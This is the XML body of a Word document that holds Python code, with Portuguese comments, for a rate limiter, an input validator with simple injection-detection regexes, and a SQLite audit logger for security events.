    <w:p w14:paraId="2B0F45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3E893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to_dict(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DB1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01800C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"event_id": self.event_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2874C2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"event_type": self.event_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246BE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"severity": self.severity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0BF6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"source_ip": self.source_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F889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"user_agent": self.user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B904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"endpoint": self.endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E75A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"payload_hash": self.payload_hash,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638456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"timestamp": self.timestamp.isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670386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"details": self.details,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5004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"blocked": self.blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B98B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6300A7E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0F68C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46336E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RateLimiter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2097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"""Sistema de rate limiting inteligente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E65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D4740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__init__(self, redis_client=None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FDC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self.redis_client = redis_client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370793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self.local_cache = defaultdict(lambda: defaultdict(list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B5F3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self.rules = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D9B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"default": {"requests": 100, "window": 60},  # 100 req/min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E18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"api": {"requests": 1000, "window": 60},     # 1000 req/min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8025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"auth": {"requests": 5, "window": 300},      # 5 req/5min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D75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"upload": {"requests": 10, "window": 60},    # 10 req/min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F063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"export": {"requests": 3, "window": 300}     # 3 req/5min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637D8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77270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self.blocked_ips = set()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48EC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self.suspicious_ips = defaultdict(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24941C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119A8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is_allowed(self, identifier: str, rule_type: str = "default") -&gt; tuple[bool, Dict[str, Any]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C09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"""Verifica se a requisição é permitida"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E4F2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rule = self.rules.get(rule_type, self.rules["default"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D71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current_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296986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window_start = current_time - rule["window"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BBF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50773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Verificar se IP está bloqueado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4A4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identifier in self.blocked_ips:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB089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False, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7FC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"blocked": True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D45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"reason": "IP blocked due to suspicious activity",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F27E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"retry_after": 3600  # 1 hora</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DAD1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6D92C4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27AE8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Usar Redis se disponível, senão cache local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303FE1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self.redis_client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE67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key = f"rate_limit:{rule_type}:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA3C6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pipe = self.redis_client.pipeline()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6A9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pipe.zremrangebyscore(key, 0, window_start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECAD4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pipe.zcard(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164557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pipe.zadd(key, {str(current_time): current_time})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3249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pipe.expire(key, rule["window"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FBB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results = pipe.execute()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A02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DE12B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current_requests = results[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0249CC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642EA7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Cache local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7F5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requests = self.local_cache[rule_type][identifier]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B20B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requests[:] = [req_time for req_time in requests if req_time &gt; window_start]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C7A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requests.append(current_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2C7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current_requests = len(requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B925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EDE1C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allowed = current_requests &lt;= rule["requests"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A019A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A9CE5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Detectar comportamento suspeito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60259A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not allowed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC19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self.suspicious_ips[identifier] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5802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self.suspicious_ips[identifier] &gt; 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A7F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self.blocked_ips.add(identifier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9CC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logger.warning(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP {identifier} bloqueado por atividade suspeita")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2FF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44A98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allowed, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC18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"allowed": allowed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711AF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"current_requests": current_requests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8948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"limit": rule["requests"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A30C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"window": rule["window"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F195F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"reset_time": window_start + rule["window"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EB9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7A27A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F3C6D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add_custom_rule(self, rule_type: str, requests: int, window: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E67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"""Adiciona regra customizada"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114A9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self.rules[rule_type] = {"requests": requests, "window": window}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C23E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6DA89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unblock_ip(self, ip: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD28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"""Remove IP da lista de bloqueados"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DF7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self.blocked_ips.discard(ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5BEB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ip in self.suspicious_ips:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277236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del self.suspicious_ips[ip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639AC4A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437609FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2269FC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InputValidator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571853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"""Validador robusto de entrada"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B55D0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63BE7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4325C7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self.patterns = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55C3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"email": re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B4A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"ip": re.compile(r'^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A96B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"uuid": re.compile(r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8671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"agent_id": re.compile(r'^[a-zA-Z0-9_]{3,50}$'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE67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"sql_injection": re.compile(r'(\b(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE|ALTER|EXEC|UNION)\b)', re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE32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"xss": re.compile(r'&lt;script|javascript:|on\w+\s*=', re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8A7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"path_traversal": re.compile(r'\.\./|\.\.\\'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D54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"command_injection": re.compile(r'[;&amp;|`$(){}[\]&lt;&gt;]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C7D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BB27D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996F6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self.max_lengths = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6BEB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"agent_id": 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A80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"message": 10000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217132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"filename": 255,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB21F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"description": 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272D0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"name": 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB66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55C8D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ABF43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validate_input(self, data: Any, field_type: str, required: bool = True) -&gt; tuple[bool, str]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688A3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"""Valida entrada de dados"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F06A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data is None or data == "":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2415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required:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6470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False, f"Campo {field_type} é obrigatório"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CA5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True, ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B872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F1F2C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Converter para string se necessário</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D0B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not isinstance(data, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183B1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data = str(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143679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8E492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Verificar comprimento máximo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA7B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field_type in self.max_lengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3CF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len(data) &gt; self.max_lengths[field_type]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BFD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False, f"Campo {field_type} excede o tamanho máximo de {self.max_lengths[field_type]} caracteres"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5D2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205EA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Validações específicas por tipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180228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field_type == "email":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D709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not self.patterns["email"].match(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C2E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False, "Email inválido"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD658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319F3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elif field_type == "ip":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E7B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263578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ipaddress.ip_address(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C696A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except ValueError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C87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False, "Endereço IP inválido"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6520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896C1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elif field_type == "uuid":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A97F2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not self.patterns["uuid"].match(data.lower()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52397A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False, "UUID inválido"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215D5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AB547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elif field_type == "agent_id":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377712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not self.patterns["agent_id"].match(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11D6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False, "ID do agente deve conter apenas letras, números e underscore (3-50 caracteres)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D49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8F659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Verificações de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6B9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security_checks = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB4E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("sql_injection", "Possível tentativa de SQL injection detectada"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A23E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("xss", "Possível tentativa de XSS detectada"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58432D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("path_traversal", "Possível tentativa de path traversal detectada"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242433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("command_injection", "Possível tentativa de command injection detectada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC73F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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3CF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F92DB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check_type, error_msg in security_checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B57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self.patterns[check_type].search(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F86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False, error_msg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046CF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78448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True, ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D977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9CDF1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sanitize_input(self, data: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8F8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"""Sanitiza entrada removendo caracteres perigosos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F1E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not isinstance(data, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32092A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data = str(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A072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A6594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Remover caracteres de controle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E8B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data = ''.join(char for char in data if ord(char) &gt;= 32 or char in '\n\r\t')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B08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32C49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Escapar caracteres HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15012F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html_escape_table = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698252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"&amp;": "&amp;amp;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B365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'"': "&amp;quot;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849A3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"'": "&amp;#x27;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10B6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"&gt;": "&amp;gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382485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"&lt;": "&amp;lt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1357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D00F7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9361D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char, escape in html_escape_table.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2784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data = data.replace(char, escape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731366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A5EEF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data.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371218B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4AA1A2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6627A1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AuditLogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19691A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"""Sistema de logs de auditoria"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702AB8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1F042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__init__(self, db_path: str = "security_audit.db"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692853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self.db_path = db_path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23BE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self.init_database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35609A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self.log_queue = deque(maxlen=10000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560222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self.processing_thread = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1D9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self.processing_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2CE1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3DADE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init_database(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E856C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"""Inicializa banco de dados de auditoria"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5BA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conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E522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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C38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AC20F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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6F2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CREATE TABLE IF NOT EXISTS security_events (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F18C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id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A855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event_id TEXT UNIQUE NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2EC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event_type TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED22B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severity TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE4DA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source_ip TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099605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user_agent TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6550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endpoint TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDCC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payload_hash TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B17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timestamp DATETIME NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C27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 TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B9D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blocked BOOLEAN DEFAULT FALSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7B3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created_at DATETIME DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B456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3B5DB8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""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585A6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34B5C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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3509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CREATE INDEX IF NOT EXISTS idx_security_events_timestamp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF08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ON security_events(timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5A8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""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3A5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F0DC6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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85D5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CREATE INDEX IF NOT EXISTS idx_security_events_severity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E58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ON security_events(severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51636A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""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF84F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A089C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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A79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CREATE INDEX IF NOT EXISTS idx_security_events_source_ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A692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ON security_events(source_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715351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""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460D1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14960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conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA2C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conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268EF7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5B504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Banco de dados de auditoria inicializado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75C3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CD20E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start_processing(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172FC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"""Inicia processamento de logs"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B59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self.processing_active = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6B8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self.processing_thread = threading.Thread(target=self._process_logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D02D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self.processing_thread.daemon = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F70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self.processing_thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697081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1C2D30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stop_processing(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4FB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"""Para processamento de logs"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062CB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self.processing_active = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B7F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self.processing_thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF684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self.processing_thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225359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2A2B6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log_security_event(self, event: SecurityEvent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731E9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"""Registra evento de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E15B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self.log_queue.append(event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091FE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BD0F0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Log crítico imediato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A055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event.severity == "critical":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F456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self._store_event_immediately(event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A02C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9E68A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_process_logs(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C50DE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"""Processa fila de logs"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B5D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while self.processing_active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DB86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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE94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self.log_queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63F4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events_to_process = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D54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0BC911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# Processar até 100 eventos por vez</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E49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for _ in range(min(100, len(self.log_queue))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A70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self.log_queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E296F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events_to_process.append(self.log_queue.popleft())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A568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52AB47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events_to_process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD536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self._store_events_batch(events_to_process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A420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108299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time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56AE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176EE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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9880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no processamento de logs: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E7A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100C77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_store_event_immediately(self, event: SecurityEvent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494411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"""Armazena evento crítico imediatamente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362F8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conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DBF8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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC94F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8FF27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2F9762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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F18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INSERT INTO security_events (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87DF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event_id, event_type, severity, source_ip, user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668490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endpoint, payload_hash, timestamp, details, blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069606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) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A11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""", (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD41D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event.event_id, event.event_type, event.severity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B4A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event.source_ip, event.user_agent, event.endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE03C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event.payload_hash, event.timestamp, json.dumps(event.details),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886AA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event.blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C3F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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55E9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DF392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conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437F4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1AB36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5058A2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ao armazenar evento cr</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tico: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361DC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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49D2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conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071556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8A7EC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_store_events_batch(self, events: List[SecurityEvent]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D331C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"""Armazena lote de eventos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD774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conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2A4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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7A67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4E32D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7A5AC6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data = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C07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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212D1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event.event_id, event.event_type, event.severity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F194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event.source_ip, event.user_agent, event.endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA65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event.payload_hash, event.timestamp, json.dumps(event.details),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BCB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event.blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAD9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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B86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event in events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC38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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534089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DF25F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cursor.executemany("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063ED5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INSERT OR IGNORE INTO security_events (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D08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event_id, event_type, severity, source_ip, user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5F71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endpoint, payload_hash, timestamp, details, blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F1F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) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED75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""", data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB0F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A2A2F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conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CF6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249A9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1EEA38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ao armazenar lote de eventos: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F79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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EC4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conn.close()</w:t>
